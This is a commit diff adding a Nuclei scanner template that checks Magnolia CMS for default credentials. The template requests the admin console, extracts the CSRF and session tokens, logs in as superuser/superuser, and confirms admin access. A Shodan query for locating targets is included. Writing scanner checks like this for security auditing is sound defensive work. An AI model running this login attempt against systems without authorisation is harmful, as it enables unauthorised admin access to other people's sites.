Merge pull request #6898 from projectdiscovery/pussycat0x-patch-4

Magnolia Default Login

default-logins/magnolia-default-login.yaml

@@ -0,0 +1,75 @@
+id: magnolia-default-login
+
+info:
+  name: Magnolia Default Login
+  author: pussycat0x
+  severity: high
+  description: Mangnolia CMS default credentials were discovered.
+  reference:
+    - https://www.magnolia-cms.com/
+  metadata:
+    verified: "true"
+    shodan-query: html:"Magnolia is a registered trademark"
+  tags: magnolia,default-login
+
+requests:
+  - raw:
+
+      - |
+        GET /.magnolia/admincentral HTTP/1.1
+        Host: {{Hostname}}
+
+      - |
+        POST /.magnolia/admincentral HTTP/1.1
+        Host: {{Hostname}}
+        Cookie: csrf={{csrf}};JSESSIONID={{session}}
+        Content-Type: application/x-www-form-urlencoded
+        Origin: {{BaseURL}}
+        Referer: {{BaseURL}}/.magnolia/admincentral
+
+        mgnlUserId={{username}}&mgnlUserPSWD={{password}}&csrf={{csrf}}
+
+      - |
+        GET /.magnolia/admincentral/PUSH?v-uiId=1 HTTP/1.1
+        Host: {{Hostname}}
+        Cookie: csrf={{csrf}}; JSESSIONID={{session}}
+
+    payloads:
+      username:
+        - superuser
+      password:
+        - superuser
+    attack: pitchfork
+
+    extractors:
+      - type: kval
+        name: csrf
+        part: header
+        internal: true
+        kval:
+          - csrf
+
+      - type: kval
+        name: session
+        internal: true
+        part: header
+        kval:
+          - JSESSIONID
+
+    matchers-condition: and
+    matchers:
+      - type: word
+        part: body_3
+        words:
+          - '"changes":'
+          - '"resources":'
+        condition: and
+
+      - type: word
+        part: header_3
+        words:
+          - 'application/json'
+
+      - type: status
+        status:
+          - 200